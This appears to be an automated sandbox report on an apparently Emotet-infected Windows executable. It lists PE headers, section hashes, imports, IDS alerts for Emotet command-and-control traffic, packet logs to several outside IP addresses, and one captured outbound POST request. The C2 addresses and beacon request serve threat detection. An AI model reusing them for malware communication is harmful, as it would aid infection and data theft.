IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34648 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2e000 | 0x5ac | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x38bbc | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c806 | 0x2d000 | a1f46075ae8d1c2a59b224793a39fa17 | False | 0.5946017795138889 | data | 6.574938035016087 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2e000 | 0xc8e6 | 0xd000 | 209b1f7310f5f0a23d5f79cfff96500b | False | 0.33680138221153844 | data | 4.9172308771954265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3b000 | 0x5f74 | 0x3000 | 8b09d8979c02b69cae22ad732358f6fa | False | 0.2674153645833333 | data | 3.850805729333682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x41000 | 0x340b0 | 0x35000 | 4472d4467d39a717951d9704e350b809 | False | 0.9107136276533019 | data | 7.709158800124314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x721c8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x72300 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0x723e0 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365
RT_CURSOR | 0x72530 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715
RT_CURSOR | 0x72680 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x727d0 | 0x134 | data | English | United States | 0.37662337662337664
RT_CURSOR | 0x72920 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x72a70 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664
RT_CURSOR | 0x72bc0 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x72d10 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x72e60 | 0x134 | data | English | United States | 0.44155844155844154
RT_CURSOR | 0x72fb0 | 0x134 | data | English | United States | 0.4155844155844156
RT_CURSOR | 0x73100 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922
RT_CURSOR | 0x73250 | 0x134 | data | English | United States | 0.2662337662337662
RT_CURSOR | 0x733a0 | 0x134 | data | English | United States | 0.2824675324675325
RT_CURSOR | 0x734f0 | 0x134 | data | English | United States | 0.3246753246753247
RT_BITMAP | 0x73728 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x737e0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x41b40 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.33064516129032256
RT_ICON | 0x41e28 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.4391891891891892
RT_DIALOG | 0x71ab0 | 0x102 | data | English | United States | 0.6550387596899225
RT_DIALOG | 0x71bb8 | 0x328 | data | English | United States | 0.4504950495049505
RT_DIALOG | 0x73640 | 0xe8 | data | English | United States | 0.6336206896551724
RT_STRING | 0x73928 | 0x88 | data | English | United States | 0.6691176470588235
RT_STRING | 0x739b0 | 0x82 | StarOffice Gallery theme p, 536899072 objects, 1st n | English | United States | 0.7153846153846154
RT_STRING | 0x73a38 | 0x2a | data | English | United States | 0.5476190476190477
RT_STRING | 0x73a68 | 0x192 | data | English | United States | 0.48009950248756217
RT_STRING | 0x73c00 | 0x4e2 | data | English | United States | 0.376
RT_STRING | 0x74478 | 0x31a | data | English | United States | 0.2682619647355164
RT_STRING | 0x74198 | 0x2dc | data | English | United States | 0.36885245901639346
RT_STRING | 0x74fd8 | 0x8a | data | English | United States | 0.6594202898550725
RT_STRING | 0x740e8 | 0xac | data | English | United States | 0.45348837209302323
RT_STRING | 0x74ec8 | 0xde | data | English | United States | 0.536036036036036
RT_STRING | 0x74798 | 0x4c4 | data | English | United States | 0.3221311475409836
RT_STRING | 0x74c60 | 0x264 | data | English | United States | 0.3741830065359477
RT_STRING | 0x74fa8 | 0x2c | data | English | United States | 0.5227272727272727
RT_STRING | 0x75068 | 0x42 | data | English | United States | 0.6060606060606061
RT_RCDATA | 0x41f78 | 0x2fb33 | data | English | United States | 0.9851979997850332
RT_GROUP_CURSOR | 0x723b8 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822
RT_GROUP_CURSOR | 0x72ba8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72518 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72a58 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72908 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x73238 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x727b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72e48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72668 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72cf8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x72f98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x730e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x73388 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x734d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x73628 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x41f50 | 0x22 | data | English | United States | 1.0
RT_VERSION | 0x71ee0 | 0x2e4 | data | English | United States | 0.46216216216216216
DLL | Import
KERNEL32.dll | VirtualQuery, GetStartupInfoA, GetCommandLineA, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetUnhandledExceptionFilter, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetSystemInfo, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetTimeZoneInformation, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, SetStdHandle, SetEnvironmentVariableA, GetLocaleInfoW, VirtualProtect, HeapFree, RtlUnwind, HeapAlloc, GetTickCount, SetErrorMode, GetOEMCP, GetCPInfo, GlobalFlags, InterlockedIncrement, WritePrivateProfileStringA, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GetFileTime, GetFileAttributesA, FileTimeToLocalFileTime, FileTimeToSystemTime, DeleteCriticalSection, InitializeCriticalSection, RaiseException, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedDecrement, MulDiv, FormatMessageA, LocalFree, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, lstrcpynA, GlobalUnlock, GlobalFree, FreeResource, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, FreeLibrary, SetLastError, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, MultiByteToWideChar, WideCharToMultiByte, FindResourceA, LoadResource, LockResource, SizeofResource, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, InterlockedExchange, LoadLibraryA, GetProcAddress, SetHandleCount, VirtualAlloc
USER32.dll | PostThreadMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetNextDlgGroupItem, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, RegisterClipboardFormatA, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, GetActiveWindow, IsWindowVisible, GetKeyState, GetCursorPos, ValidateRect, MessageBoxA, DestroyMenu, InvalidateRgn, InvalidateRect, CopyAcceleratorTableA, SetRect, IsRectEmpty, CharNextA, GetSysColorBrush, ReleaseCapture, LoadCursorA, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostQuitMessage, PostMessageA, PeekMessageA, DispatchMessageA, CharUpperA, MessageBeep, GetSystemMetrics, LoadIconA, EnableWindow, KillTimer, SetTimer, GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, DrawIcon, CopyRect, SetCapture, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, wsprintfA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, SetWindowLongA
GDI32.dll | DeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetDeviceCaps, GetObjectA, SetBkColor, SetTextColor, GetClipBox, DeleteDC, CreateBitmap
comdlg32.dll | GetFileTitleA
WINSPOOL.DRV | DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll | RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegOpenKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegCloseKey
COMCTL32.dll |
SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll |
ole32.dll | StgOpenStorageOnILockBytes, CoRevokeClassObject, CLSIDFromProgID, CLSIDFromString, CoTaskMemFree, CoTaskMemAlloc, CoGetClassObject, StgCreateDocfileOnILockBytes, CreateILockBytesOnHGlobal, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard
OLEAUT32.dll | SysFreeString, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysAllocStringLen
WS2_32.dll | WSACleanup, closesocket, accept, socket, select, gethostbyname, htonl, htons, inet_addr, bind, WSAGetLastError, WSASetLastError, WSAStartup, sendto, recvfrom, WSAAsyncSelect, send, recv, listen, connect
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-20T19:11:56.438207+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49747 | 80 | 192.168.2.6 | 74.214.230.200
2024-08-20T19:09:53.067014+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49749 | 443 | 192.168.2.6 | 194.187.133.160
2024-08-20T19:11:31.533291+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
2024-08-20T19:10:28.346788+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49730 | 80 | 192.168.2.6 | 88.153.35.32
2024-08-20T19:10:55.327152+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
2024-08-20T19:11:07.013000+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
2024-08-20T19:10:52.310016+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
2024-08-20T19:11:00.118321+0200 | TCP | 2035077 | ET MALWARE Win32/Emotet CnC Activity (POST) M1 | 1 | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 20, 2024 19:10:06.949390888 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:06.954781055 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:06.954853058 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:06.954998016 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:06.955037117 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:06.959852934 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:06.959886074 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:06.959923983 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:06.959934950 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:06.959944963 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:28.346565008 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:28.346787930 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:28.350147009 CEST | 49730 | 80 | 192.168.2.6 | 88.153.35.32
Aug 20, 2024 19:10:28.355870962 CEST | 80 | 49730 | 88.153.35.32 | 192.168.2.6
Aug 20, 2024 19:10:30.925040007 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:30.931057930 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:30.931142092 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:30.931354046 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:30.931421041 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:30.939270020 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:30.939280987 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:30.939287901 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:30.941484928 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:30.941495895 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:52.309874058 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:52.310015917 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:52.310096025 CEST | 49735 | 8080 | 192.168.2.6 | 107.170.146.252
Aug 20, 2024 19:10:52.314894915 CEST | 8080 | 49735 | 107.170.146.252 | 192.168.2.6
Aug 20, 2024 19:10:54.673186064 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:10:54.678270102 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:54.678338051 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:10:54.678457975 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:10:54.678488016 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:10:54.684120893 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:54.684130907 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:54.684139013 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:54.685502052 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:54.685511112 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:55.327039003 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:10:55.327152014 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:10:58.703808069 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:10:58.708853006 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:10:58.708939075 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:10:58.709069014 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:10:58.709096909 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:10:58.713998079 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:10:58.714062929 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:10:58.714071989 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:10:58.714080095 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:10:58.715401888 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:11:00.118257046 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:11:00.118320942 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:11:00.118386030 CEST | 49740 | 8080 | 192.168.2.6 | 167.114.153.111
Aug 20, 2024 19:11:00.123850107 CEST | 8080 | 49740 | 167.114.153.111 | 192.168.2.6
Aug 20, 2024 19:11:00.321774960 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:11:00.321861029 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:11:02.433124065 CEST | 49741 | 443 | 192.168.2.6 | 67.170.250.203
Aug 20, 2024 19:11:02.433195114 CEST | 443 | 49741 | 67.170.250.203 | 192.168.2.6
Aug 20, 2024 19:11:02.433273077 CEST | 49741 | 443 | 192.168.2.6 | 67.170.250.203
Aug 20, 2024 19:11:02.433474064 CEST | 49741 | 443 | 192.168.2.6 | 67.170.250.203
Aug 20, 2024 19:11:02.433490992 CEST | 443 | 49741 | 67.170.250.203 | 192.168.2.6
Aug 20, 2024 19:11:02.433516979 CEST | 49741 | 443 | 192.168.2.6 | 67.170.250.203
Aug 20, 2024 19:11:02.433523893 CEST | 443 | 49741 | 67.170.250.203 | 192.168.2.6
Aug 20, 2024 19:11:02.433558941 CEST | 443 | 49741 | 67.170.250.203 | 192.168.2.6
Aug 20, 2024 19:11:05.068944931 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:05.078578949 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:05.078685045 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:05.081152916 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:05.081254005 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:05.086302996 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:05.086337090 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:05.086349010 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:05.086380005 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:05.087517977 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:07.012852907 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:07.013000011 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:07.013031960 CEST | 49742 | 7080 | 192.168.2.6 | 121.124.124.40
Aug 20, 2024 19:11:07.021037102 CEST | 7080 | 49742 | 121.124.124.40 | 192.168.2.6
Aug 20, 2024 19:11:10.162195921 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:10.167212963 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:10.167280912 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:10.167423010 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:10.167495012 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:10.172965050 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:10.172991991 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:10.173003912 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:10.173016071 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:10.173372030 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:31.533180952 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:31.533291101 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:31.533406973 CEST | 49745 | 8080 | 192.168.2.6 | 103.86.49.11
Aug 20, 2024 19:11:31.538299084 CEST | 8080 | 49745 | 103.86.49.11 | 192.168.2.6
Aug 20, 2024 19:11:35.079536915 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:35.084547997 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:35.084620953 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:35.085169077 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:35.085203886 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:35.090039015 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:35.090065956 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:35.090143919 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:35.090153933 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:35.090162992 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:56.438079119 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:56.438206911 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:56.438340902 CEST | 49747 | 80 | 192.168.2.6 | 74.214.230.200
Aug 20, 2024 19:11:56.443981886 CEST | 80 | 49747 | 74.214.230.200 | 192.168.2.6
Aug 20, 2024 19:11:56.911058903 CEST | 49739 | 7080 | 192.168.2.6 | 173.212.214.235
Aug 20, 2024 19:11:56.916163921 CEST | 7080 | 49739 | 173.212.214.235 | 192.168.2.6
Aug 20, 2024 19:11:59.081245899 CEST | 49749 | 443 | 192.168.2.6 | 194.187.133.160
Aug 20, 2024 19:11:59.081304073 CEST | 443 | 49749 | 194.187.133.160 | 192.168.2.6
Aug 20, 2024 19:11:59.081392050 CEST | 49749 | 443 | 192.168.2.6 | 194.187.133.160
Aug 20, 2024 19:11:59.081681013 CEST | 49749 | 443 | 192.168.2.6 | 194.187.133.160
Aug 20, 2024 19:11:59.081702948 CEST | 443 | 49749 | 194.187.133.160 | 192.168.2.6
Aug 20, 2024 19:11:59.081722975 CEST | 49749 | 443 | 192.168.2.6 | 194.187.133.160
Aug 20, 2024 19:11:59.081732035 CEST | 443 | 49749 | 194.187.133.160 | 192.168.2.6
Aug 20, 2024 19:11:59.081748009 CEST | 443 | 49749 | 194.187.133.160 | 192.168.2.6
• 88.153.35.32
• 107.170.146.252
  • 107.170.146.252:8080
• 173.212.214.235
  • 173.212.214.235:7080
• 167.114.153.111
  • 167.114.153.111:8080
• 67.170.250.203
  • 67.170.250.203:443
• 121.124.124.40
  • 121.124.124.40:7080
• 103.86.49.11
  • 103.86.49.11:8080
• 74.214.230.200
• 194.187.133.160
  • 194.187.133.160:443
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.6 | 49730 | 88.153.35.32 | 80 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:10:06.954998016 CEST | 560 | OUT | POST /LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 88.153.35.32/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=--------------oxhn8YFF02lqHF
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 88.153.35.32
                                                                Content-Length: 4628
